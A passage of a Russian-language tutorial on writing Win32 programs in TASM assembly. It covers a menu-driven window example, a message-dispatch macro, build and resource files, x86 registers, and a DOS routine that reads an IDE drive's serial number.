при выгрузке библиотеки из адресного пространства процесса (DLL_PROCESS_DETACH).
В нашем примере обрабатывается только первое из событий DLL_PROCESS_ATTACH. При обработке данного события библиотека запрашивает версию OS сохраняет её, а также свой handle of instance.

Библиотека содержит только одну экспортируемую функцию, которая собственно не требует пояснений. Вы, пожалуй, можете обратить внимание на то, как производится запись преобразованных значений. Интересна система адресации посредством двух регистров общего назначения: ebx + ecx, она позволяет нам использовать регистр ecx одновременно и как счётчик и как составную часть адреса.

Пример 3. Оконное приложение

Ideal
P586
Model flat

struc WndClassEx
cbSize dd 0
style dd 0
lpfnWndProc dd 0
cbClsExtra dd 0
cbWndExtra dd 0
hInstance dd 0
hIcon dd 0
hCursor dd 0
hbrBackground dd 0
lpszClassName dd 0
hIconSm dd 0
ends WndClassEx

struc Point
x dd 0
y dd 0
ends Point

struc msgStruc
hwnd dd 0
message dd 0
wParam dd 0
lParam dd 0
time dd 0
pnt Point <>
ends msgStruc

ID_OPEN = 9C41
ID_SAVE = 9C42
ID_EXIT = 9C43

CS_HREDRAW = 0001
CS_VREDRAW = 0002
IDI_APPLICATION = 7F00
IDC_ARROW = 00007F00
COLOR_WINDOW = 5
WS_EX_WINDOWEDGE = 00000100
WS_EX_CLIENTEDGE = 00000200
WS_EX_OVERLAPPEDWINDOW = WS_EX_WINDOWEDGE OR WS_EX_CLIENTEDGE
WS_OVERLAPPED = 00000000
WS_CAPTION = 00C00000
WS_THICKFRAME = 00040000
WS_MINIMIZEBOX = 00020000
WS_MAXIMIZEBOX = 00010000
WS_OVERLAPPEDWINDOW = WS_OVERLAPPED OR WS_CAPTION OR \\
WS_MINIMIZEBOX OR WS_MAXIMIZEBOX
CW_USEDEFAULT = 80000000
SW_SHOW = 5
WM_COMMAND = 0111
WM_DESTROY = 0002
WM_CLOSE = 0010
MB_OK = 0

PROCTYPE ptGetModuleHandle stdcall \\
lpModuleName :dword

hInstance :dword, \\
lpIconName :dword

hInstance :dword, \\
lpCursorName :dword

hInstance :dword, \\

PROCTYPE ptRegisterClassEx stdcall \\
lpwcx :dword

PROCTYPE ptCreateWindowEx stdcall \\
dwExStyle :dword, \\
lpClassName :dword, \\
lpWindowName :dword, \\
dwStyle :dword, \\
x :dword, \\
y :dword, \\
nWidth :dword, \\
nHeight :dword, \\
hWndParent :dword, \\
hInstance :dword, \\
lpParam :dword

PROCTYPE ptShowWindow stdcall \\
hWnd :dword, \\
nCmdShow :dword

PROCTYPE ptUpdateWindow stdcall \\
hWnd :dword

PROCTYPE ptGetMessage stdcall \\
pMsg :dword, \\
hWnd :dword, \\
wMsgFilterMin :dword, \\
wMsgFilterMax :dword

PROCTYPE ptTranslateMessage stdcall \\
lpMsg :dword

PROCTYPE ptDispatchMessage stdcall \\
pmsg :dword

hWnd :dword, \\

PROCTYPE ptPostQuitMessage stdcall \\
nExitCode :dword

PROCTYPE ptDefWindowProc stdcall \\
hWnd :dword, \\
Msg :dword, \\
wParam :dword, \\
lParam :dword

PROCTYPE ptSendMessage stdcall \\
hWnd :dword, \\
Msg :dword, \\
wParam :dword, \\
lParam :dword

PROCTYPE ptMessageBox stdcall \\
hWnd :dword, \\
lpText :dword, \\
lpCaption :dword, \\
uType :dword

PROCTYPE ptExitProcess stdcall \\
exitCode :dword

extrn GetModuleHandleA :ptGetModuleHandle
extrn RegisterClassExA :ptRegisterClassEx
extrn CreateWindowExA :ptCreateWindowEx
extrn ShowWindow :ptShowWindow
extrn UpdateWindow :ptUpdateWindow
extrn GetMessageA :ptGetMessage
extrn TranslateMessage :ptTranslateMessage
extrn DispatchMessageA :ptDispatchMessage
extrn PostQuitMessage :ptPostQuitMessage
extrn DefWindowProcA :ptDefWindowProc
extrn SendMessageA :ptSendMessage
extrn MessageBoxA :ptMessageBox
extrn ExitProcess :ptExitProcess

UDataSeg
hInst dd ?
hWnd dd ?

IFNDEF VER1
ENDIF

DataSeg
msg msgStruc <>
wndTitle db \’Demo program\’, 0
msg_open_txt db \’You selected open\’, 0
msg_open_tlt db \’Open box\’, 0
msg_save_txt db \’You selected save\’, 0
msg_save_tlt db \’Save box\’, 0

CodeSeg
Start: call GetModuleHandleA, 0 ; получаем hInstance
mov [hInst],eax

sub esp,SIZE WndClassEx ; выделяем место в стеке
; заполняем структуру WndClassEx
mov [(WndClassEx esp).cbSize],SIZE WndClassEx
mov [(WndClassEx esp).style],CS_HREDRAW or CS_VREDRAW
mov [(WndClassEx esp).lpfnWndProc],offset WndProc
mov [(WndClassEx esp).cbWndExtra],0
mov [(WndClassEx esp).cbClsExtra],0
mov [(WndClassEx esp).hInstance],eax
mov [(WndClassEx esp).hIcon],eax
mov [(WndClassEx esp).hCursor],eax
mov [(WndClassEx esp).hbrBackground],COLOR_WINDOW
IFDEF VER1
ELSE
ENDIF
mov [(WndClassEx esp).lpszClassName],offset classTitle
mov [(WndClassEx esp).hIconSm],0
call RegisterClassExA, esp ; регистрируем окно

add esp,SIZE WndClassEx ; восстановим стек
; создадим окно

IFNDEF VER2
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \\ extended window style
offset classTitle, \\ pointer to registered class name
offset wndTitle, \\ pointer to window name
WS_OVERLAPPEDWINDOW, \\ window style
CW_USEDEFAULT, \\ horizontal position of window
CW_USEDEFAULT, \\ vertical position of window
CW_USEDEFAULT, \\ window width
CW_USEDEFAULT, \\ window height
0, \\ handle to parent or owner window
0, \\ handle to menu, or child-window
\\ identifier
[hInst], \\ handle to application instance
0 ; pointer to window-creation data
ELSE
call CreateWindowExA, WS_EX_OVERLAPPEDWINDOW, \\ extended window style
offset classTitle, \\ pointer to registered class name
offset wndTitle, \\ pointer to window name
WS_OVERLAPPEDWINDOW, \\ window style
CW_USEDEFAULT, \\ horizontal position of window
CW_USEDEFAULT, \\ vertical position of window
CW_USEDEFAULT, \\ window width
CW_USEDEFAULT, \\ window height
0, \\ handle to parent or owner window
eax, \\ handle to menu, or child-window
\\ identifier
[hInst], \\ handle to application instance
0 ; pointer to window-creation data
ENDIF
mov [hWnd],eax
call ShowWindow, eax, SW_SHOW ; show window
call UpdateWindow, [hWnd] ; redraw window

IFDEF VER3
ENDIF

msg_loop:
call GetMessageA, offset msg, 0, 0, 0
or ax,ax
jz exit
call TranslateMessage, offset msg
call DispatchMessageA, offset msg
jmp msg_loop
exit: call ExitProcess, 0

public stdcall WndProc
proc WndProc stdcall
arg @@hwnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
mov eax,[@@msg] cmp eax,WM_COMMAND
je @@command
cmp eax,WM_DESTROY
jne @@default
call PostQuitMessage, 0
xor eax,eax
jmp @@ret
@@default:
call DefWindowProcA, [@@hwnd], [@@msg], [@@wPar], [@@lPar] @@ret: ret
@@command:
mov eax,[@@wPar] cmp eax,ID_OPEN
je @@open
cmp eax,ID_SAVE
je @@save
call SendMessageA, [@@hwnd], WM_CLOSE, 0, 0
xor eax,eax
jmp @@ret
@@open: mov eax, offset msg_open_txt
mov edx, offset msg_open_tlt
jmp @@mess
@@save: mov eax, offset msg_save_txt
mov edx, offset msg_save_tlt
@@mess: call MessageBoxA, 0, eax, edx, MB_OK
xor eax,eax
jmp @@ret
endp WndProc
end Start
Комментарии к программе
Здесь мне хотелось в первую очередь продемонстрировать использование прототипов функций API Win32. Конечно их (а также описание констант и структур из API Win32) следует вынести в отдельные подключаемые файлы, поскольку, скорее всего Вы будете использовать их и в других программах. Описание прототипов функций обеспечивает строгий контроль со стороны компилятора за количеством и типом параметров, передаваемых в функции. Это существенно облегчает жизнь программисту, позволяя избежать ошибок времени исполнения, тем более, что число параметров в некоторых функциях API Win32 весьма значительно.

Существо данной программы заключается в демонстрации вариантов работы с оконным меню. Программу можно откомпилировать в трёх вариантах (версиях), указывая компилятору ключи VER2 или VER3 (по умолчанию используется ключ VER1). В первом варианте программы меню определяется на уровне класса окна и все окна данного класса будут иметь аналогичное меню. Во втором варианте, меню определяется при создании окна, как параметр функции CreateWindowEx. Класс окна не имеет меню и в данном случае, каждое окно этого класса может иметь своё собственное меню. Наконец, в третьем варианте, меню загружается после создания окна. Данный вариант показывает, как можно связать меню с уже созданным окном.

Директивы условной компиляции позволяют включить все варианты в текст одной и той же программы. Подобная техника удобна не только для демонстрации, но и для отладки. Например, когда Вам требуется включить в программу новый фрагмент кода, то Вы можете применить данную технику, дабы не потерять функционирующий модуль. Ну, и конечно, применение директив условной компиляции — наиболее удобное средство тестирования различных решений (алгоритмов) на одном модуле.

Представляет определённый интерес использование стековых фреймов и заполнение структур в стеке посредством регистра указателя стека (esp). Именно это продемонстрировано при заполнении структуры WndClassEx. Выделение места в стеке (фрейма) делается простым перемещением esp: sub esp,SIZE WndClassEx

Теперь мы можем обращаться к выделенной памяти используя всё тот же регистр указатель стека. При создании 16-битных приложений такой возможностью мы не обладали. Данный приём можно использовать внутри любой процедуры или даже произвольном месте программы. Накладные расходы на подобное выделение памяти минимальны, однако, следует учитывать, что размер стека ограничен и размещать большие объёмы данных в стеке вряд ли целесообразно. Для этих целей лучше использовать \»кучи\» (heap) или виртуальную память (virtual memory).

Остальная часть программы достаточно тривиальна и не требует каких-либо пояснений. Возможно более интересным покажется тема использования макроопределений.

Макроопределения
Мне достаточно редко приходилось серьёзно заниматься разработкой макроопределений при программировании под DOS. В Win32 ситуация принципиально иная. Здесь грамотно написанные макроопределения способны не только облегчить чтение и восприятие программ, но и реально облегчить жизнь программистов. Дело в том, что в Win32 фрагменты кода часто повторяются, имея при этом не принципиальные отличия. Наиболее показательна, в этом смысле, оконная и/или диалоговая процедура. И в том и другом случае мы определяем вид сообщения и передаём управление тому участку кода, который отвечает за обработку полученного сообщения. Если в программе активно используются диалоговые окна, то аналогичные фрагменты кода сильно перегрузят программу, сделав её малопригодной для восприятия. Применение макроопределений в таких ситуациях более чем оправдано. В качестве основы для макроопределения, занимающегося диспетчеризацией поступаю щих сообщений на обработчиков, может послужить следующее описание.

Пример макроопределений

macro MessageVector message1, message2:REST
IFNB
dd message1
dd offset @@&message1

@@VecCount = @@VecCount + 1
MessageVector message2
ENDIF
endm MessageVector

macro WndMessages VecName, message1, message2:REST
@@VecCount = 0
DataSeg
label @@&VecName dword
MessageVector message1, message2
@@&VecName&Cnt = @@VecCount
CodeSeg
mov ecx,@@&VecName&Cnt

mov eax,[@@msg] @@&VecName&_1: dec ecx
js @@default
cmp eax,[dword ecx * 8 + offset @@&VecName] jne @@&VecName&_1
jmp [dword ecx + offset @@&VecName + 4]

@@default: call DefWindowProcA, [@@hWnd], [@@msg], [@@wPar], [@@lPar] @@ret: ret
@@ret_false: xor eax,eax
jmp @@ret
@@ret_true: mov eax,-1
dec eax
jmp @@ret
endm WndMessage
Комментарии к макроопределениям
При написании процедуры окна Вы можете использовать макроопределение WndMessages, указав в списке параметров те сообщения, обработку которых намерены осуществить. Тогда процедура окна примет вид:

proc WndProc stdcall
arg @@hWnd: dword, @@msg: dword, @@wPar: dword, @@lPar: dword
WndMessages WndVector, WM_CREATE, WM_SIZE, WM_PAINT, WM_CLOSE, WM_DESTROY

@@WM_CREATE:
; здесь обрабатываем сообщение WM_CREATE
@@WM_SIZE:
; здесь обрабатываем сообщение WM_SIZE
@@WM_PAINT:
; здесь обрабатываем сообщение WM_PAINT
@@WM_CLOSE:
; здесь обрабатываем сообщение WM_CLOSE
@@WM_DESTROY:
; здесь обрабатываем сообщение WM_DESTROY

endp WndProc
Обработку каждого сообщения можно завершить тремя способами:

вернуть значение TRUE, для этого необходимо использовать переход на метку @@ret_true;
вернуть значение FALSE, для этого необходимо использовать переход на метку @@ret_false;
перейти на обработку по умолчанию, для этого необходимо сделать переход на метку @@default.
Отметьте, что все перечисленные метки определены в макро WndMessages и Вам не следует определять их заново в теле процедуры.

Теперь давайте разберёмся, что происходит при вызове макроопределения WndMessages. Вначале производится обнуление счётчика параметров самого макроопределения (число этих параметров может быть произвольным). Теперь в сегменте данных создадим метку с тем именем, которое передано в макроопределение в качестве первого параметра. Имя метки формируется путём конкатенации символов @@ и названия вектора. Достигается это за счёт использования оператора &. Например, если передать имя TestLabel, то название метки примет вид: @@TestLabel. Сразу за объявлением метки вызывается другое макроопределение MessageVector, в которое передаются все остальные параметры, которые должны быть ничем иным, как списком сообщений, подлежащих обработке в процедуре окна. Структура макроопределения MessageVector проста и бесхитростна. Она извлекает первый параметр и в ячейку памяти формата dword заносит код сообщения. В следующую ячейку памяти формата dword записывается а дрес метки обработчика, имя которой формируется по описанному выше правилу. Счётчик сообщений увеличивается на единицу. Далее следует рекурсивный вызов с передачей ещё не зарегистрированных сообщений, и так продолжается до тех пор, пока список сообщений не будет исчерпан.

Сейчас в макроопределении WndMessage можно начинать обработку. Теперь существо обработки скорее всего будет понятно без дополнительных пояснений.

Обработка сообщений в Windows не является линейной, а, как правило, представляет собой иерархию. Например, сообщение WM_COMMAND может заключать в себе множество сообщений поступающих от меню и/или других управляющих элементов. Следовательно, данную методику можно с успехом применить и для других уровней каскада и даже несколько упростить её. Действительно, не в наших силах исправить код сообщений, поступающих в процедуру окна или диалога, но выбор последовательности констант, назначаемых пунктам меню или управляющим элементам (controls) остаётся за нами. В этом случае нет нужды в дополнительном поле, которое сохраняет код сообщения. Тогда каждый элемент вектора будет содержать только адрес обработчика, а найти нужный элемент весьма просто. Из полученной константы, пришедшей в сообщении, вычитается идентификатор первого пункта меню или первого управляющего элемента, это и будет номер нужного элемента вектора. Остаётся только сделать переход на обработчик.

Вообще тема макроопределений весьма поучительна и обширна. Мне редко доводится видеть грамотное использование макросов и это досадно, поскольку с их помощью можно сделать работу в ассемблере значительно проще и приятнее.

Резюме
Для того, чтобы писать полноценные приложения под Win32 требуется не так много:

собственно компилятор и компоновщик (я использую связку TASM32 и TLINK32 из пакета TASM 5.0). Перед использованием рекомендую \»наложить\» patch, на данный пакет. Patch можно взять на site http://www.borland.com/ или на нашем ftp сервере ftp.uralmet.ru.
редактор и компилятор ресурсов (я использую Developer Studio и brcc32.exe);
выполнить перетрансляцию header файлов с описаниями процедур, структур и констант API Win32 из нотации принятой в языке Си, в нотацию выбранного режима ассемблера: Ideal или MASM.
В результате у Вас появится возможность писать лёгкие и изящные приложения под Win32, с помощью которых Вы сможете создавать и визуальные формы, и работать с базами данных, и обслуживать коммуникации, и работать multimedia инструментами. Как и при написании программ под DOS, у Вас сохраняется возможность наиболее полного использования ресурсов процессора, но при этом сложность написания приложений значительно снижается за счёт более мощного сервиса операционной системы, использования более удобной системы адресации и весьма простого оформления программ.

Приложение 1. Файлы, необходимые для первого примера
Файл констант ресурсов resource.inc

IDD_DIALOG = 65 ; 101
IDR_NAME = 3E8 ; 1000
IDC_STATIC = -1
Файл определений dlg.def

NAME TEST
DESCRIPTION \’Demo dialog\’
EXETYPE WINDOWS
EXPORTS DlgProc @1
Файл компиляции makefile

# Make file for Demo dialog
# make -B
# make -B -DDEBUG for debug information

NAME = dlg
OBJS = \$(NAME).obj
DEF = \$(NAME).def
RES = \$(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if \$d(DEBUG)
TASMDEBUG=/zi
!else
TASMDEBUG=/l
!endif

!if \$d(MAKEDIR)
IMPORT=\$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

\$(NAME).EXE: \$(OBJS) \$(DEF) \$(RES)

.asm.obj:
tasm32 \$(TASMDEBUG) \$(TASMOPT) \$&.asm

\$(RES): \$(NAME).RC
BRCC32 -32 \$(NAME).RC
Файл заголовков resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by dlg.rc
//
#define IDD_DIALOG 101
#define IDR_NAME 1000
#define IDC_STATIC -1

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
Приложение 2. Файлы, необходимые для второго примера
Файл описания mylib.def

LIBRARY MYLIB
DESCRIPTION \’DLL EXAMPLE, 1997\’
EXPORTS Hex2Str @1
Файл компиляции makefile

# Make file for Demo DLL
# make -B
# make -B -DDEBUG for debug information

NAME = mylib
OBJS = \$(NAME).obj
DEF = \$(NAME).def
RES = \$(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if \$d(DEBUG)
TASMDEBUG=/zi
!else
TASMDEBUG=/l
!endif

!if \$d(MAKEDIR)
IMPORT=\$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

\$(NAME).EXE: \$(OBJS) \$(DEF)

.asm.obj:
tasm32 \$(TASMDEBUG) \$(TASMOPT) \$&.asm

\$(RES): \$(NAME).RC
BRCC32 -32 \$(NAME).RC
Приложение 3. Файлы, необходимые для третьего примера

NAME TEST
EXETYPE WINDOWS
EXPORTS WndProc @1

#include \»resource.h\»
BEGIN POPUP \»Files\»
BEGIN
END
END
Файл заголовков resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
//
#define ID_OPEN 40001
#define ID_SAVE 40002
#define ID_EXIT 40003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40004
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
Файл компиляции makefile

# Make file for Turbo Assembler Demo menu
# make -B
# make -B -DDEBUG -DVERN for debug information and version
OBJS = \$(NAME).obj
DEF = \$(NAME).def
RES = \$(NAME).res
!if \$d(DEBUG)TASMDEBUG=/zi
!else
TASMDEBUG=/l
!endif

!if \$d(VER2)
TASMVER=/dVER2
!elseif \$d(VER3)
TASMVER=/dVER3
!else
TASMVER=/dVER1
!endif

!if \$d(MAKEDIR)
IMPORT=\$(MAKEDIR)\\..\\lib\\import32
!else
IMPORT=import32
!endif

\$(NAME).EXE: \$(OBJS) \$(DEF) \$(RES)

.asm.obj:
tasm32 \$(TASMDEBUG) \$(TASMVER) /m /mx /z /zd \$&.asm

\$(RES): \$(NAME).RC
BRCC32 -32 \$(NAME).RC

## О регистрах в assembler

Регистр — это определенный участок памяти внутри самого процессора, от 8-ми до 32-х бит длиной, который используется для промежуточного хранения информации, обрабатываемой процессором. Некоторые регистры содержат только определенную информацию.
Регистры общего назначения — EAX, EBX, ECX, EDX. Они 32-х битные и делятся еще на две части, нижние из которых AX, BX, CD, DX — 16-ти битные, и деляется еще на два 8-ми битных регистра. Так, АХ делится на AH и AL, DX на DH и DL и т.д. Буква \»Н\» означает верхний регистр.

Так, AH и AL каждый по одному байту, АХ — 2 байта (или word — слово), ЕАХ — 4 байта (или dword — двойное слово). Эти регистры используются для операций с данными, такими, как сравнение, математические операции или запись данных в память.

Регистр СХ чаще всего используется как счетчик в циклах.

АН в DOS программах используется как определитель, какой сервис будет использоваться при вызове INT.

Регистры сегментов — это CS, DS, ES, FS, GS, SS. Эти регистры 16-ти битные, и содержат в себе первую половину адреса \»оффсет:сегмент\».

CS — сегмент кода (страница памяти) исполняемой в данный момент программы.
DS — сегмент (страница) данных исполняемой программы, т.е. константы, строковые ссылки и т.д.
SS — сегмент стека исполняемой программы.
ES, FS, GS — дополнительные сегменты, и могут не использоваться программой.
Регистры оффсета — EIP, ESP, EBP, ESI, EDI. Эти регистры 32-х битные, нижняя половина которых доступна как регистры IP, SP, BP, SI, DI.

EIP — указатель команд, и содержит оффсет (величину смещения относительно начала программы) на линию кода, которая будет исполняться следующей. То есть полный адрес на следующую исполняемую линию кода будет CS:ЕIP.
Регистр ESP указывает на адрес вершины стека (адрес, куда будет заноситься следующая переменная командой PUSH).
Регистр ЕВР содержит адрес, начиная с которого в стек вносится или забирается информация (или \»глубина\» стека). Параметры функций имеют положительный сдвиг относительно ЕВР, локальные переменные — отрицательный сдвиг, а полный адрес этого участка памяти будет SS:EBP.
Регистр ESI — адрес источника, и содержит адрес начала блока информации для операции \»переместить блок\» (полный адрес DS:SI), а регистр EDI- адрес назначения в этой операции (полный адрес ES:EDI).
Регистры управления — CR0, CR1, CR2, CR3. Эти 32-х битные регистры устанавливают режим работы процессора (нормальный, защищенный и т.д.), постраничное распределение памяти и т.д. Они доступны только для программ в первом кольце памяти (Kernel, например). Трогать их не следует.

Регистры дебаггера — DR0, DR1, DR2, DR3, DR4, DR5, DR6, DR7. Первые четыре регистра содержат адреса на точки прерывания, остальные устанавливают, что должно произойти при достижении точки прерывания.

Контрольные регистры — TR6, TR7. Используются для контроля постраничной системы распределения памяти операционной системой. Нужны только если вы собираетесь написать свою ОС.

## Как узнать сеpийный номеp, тип IDE винта?

.Model Tiny
.Code
Base_Port equ 1f0h
HD equ 0 ; Hard Disk number
.Startup
mov dx, Base_Port + 6
mov al, 10100000b or (HD shl 4)
out dx, al
jmp \$ + 2
inc dx
mov al, 0ech
out dx, al
jmp \$ + 2
@@Wait: in al, dx
jmp \$ + 2
test al, 80h
jnz @@Wait
mov dx, Base_Port
lea di, Buffer
mov cx, 100h
@@1: in ax, dx
xchg ah, al
stosw
loop @@1
xor cx, cx
lea dx, Fname
mov ah, 3ch
int 21h
xchg bx, ax
lea dx, Buffer
mov cx, 100h
mov ah, 40h
int 21h
mov ah, 3eh
int 21h
ret

Fname db \’hdd_id.dat\’, 0
Buffer db 100h dup (?)

end